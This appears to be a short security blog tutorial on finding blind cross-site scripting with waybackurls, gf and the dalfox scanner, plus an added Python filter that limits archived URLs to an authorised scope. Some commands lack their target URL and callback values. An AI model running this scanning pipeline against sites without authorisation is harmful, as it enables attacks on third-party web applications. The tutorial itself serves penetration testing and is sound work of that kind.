How To Find Blind XSS Using dalfox | (dalfox #2)

Hello all

I am back with another blog on XSS. Let’s talk about blind XSS and how we can find it using the dalfox tool. I have already written a blog on dalfox, so go and check it out:

So let’s start:

We need a URL to test for blind XSS, so let’s take this:

Let’s find some URLs for this site. Type this command in your terminal: waybackurls | tee testurl.txt

Now just hit <ENTER> and it will find some URLs.

Now we have a file, testurl.txt. Next, let’s find some parameters to test for XSS. For that, use the gf tool, which is on GitHub:

The command is: cat testurl.txt | gf xss >> testxss.txt

Hit <ENTER> and it will give you some parameters to test for XSS.

So now it is time to fire up dalfox.

Just type this command: dalfox file testxss.txt pipe -b -F

Hit <ENTER> and see the response

If you want to send these requests to Burp Suite for manual testing, use this command:

dalfox file testxss.txt pipe -b -F --proxy


Go to Burp Suite and check the HTTP history. You will see that all the requests are there, and you can test them manually.
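
An added example, not part of the original post: archived URL lists usually contain many duplicates and hosts outside the agreed test scope, so it helps to reduce testurl.txt before scanning. This Python filter keeps one URL per host, path and parameter-name set for an allow-list of hosts; the function names, the static-extension list and the example.test sample URLs are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of archived URLs; example.test is a placeholder host.
SAMPLE_URLS = """\
http://example.test/search?q=shoes&page=1
http://example.test/search?page=2&q=boots
http://example.test/static/app.js?v=3
https://shop.example.test/item?id=7
https://cdn.other.test/item?id=7
http://example.test/about
not a url
"""

# Assumed list of static asset extensions that are not worth testing.
STATIC_EXT = (".js", ".css", ".png", ".jpg", ".gif", ".svg", ".ico", ".woff")

def in_scope(host, scope):
    """True if host equals a scope entry or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in scope)

def candidate_urls(lines, scope):
    """Keep one URL per (host, path, parameter-name set), in-scope hosts only."""
    seen, kept = set(), []
    for line in lines:
        url = line.strip()
        try:
            parts = urlsplit(url)
        except ValueError:
            continue  # malformed entry in the archive output
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue
        if not in_scope(parts.hostname, scope):
            continue
        if parts.path.lower().endswith(STATIC_EXT):
            continue
        names = frozenset(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
        if not names:
            continue  # no parameters to test
        key = (parts.hostname, parts.path, names)
        if key not in seen:
            seen.add(key)
            kept.append(url)
    return kept

if __name__ == "__main__":
    for u in candidate_urls(SAMPLE_URLS.splitlines(), {"example.test"}):
        print(u)
```

With a real list, pass the lines of testurl.txt and the set of hosts you are authorised to test as the scope.
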
Thanks For Reading
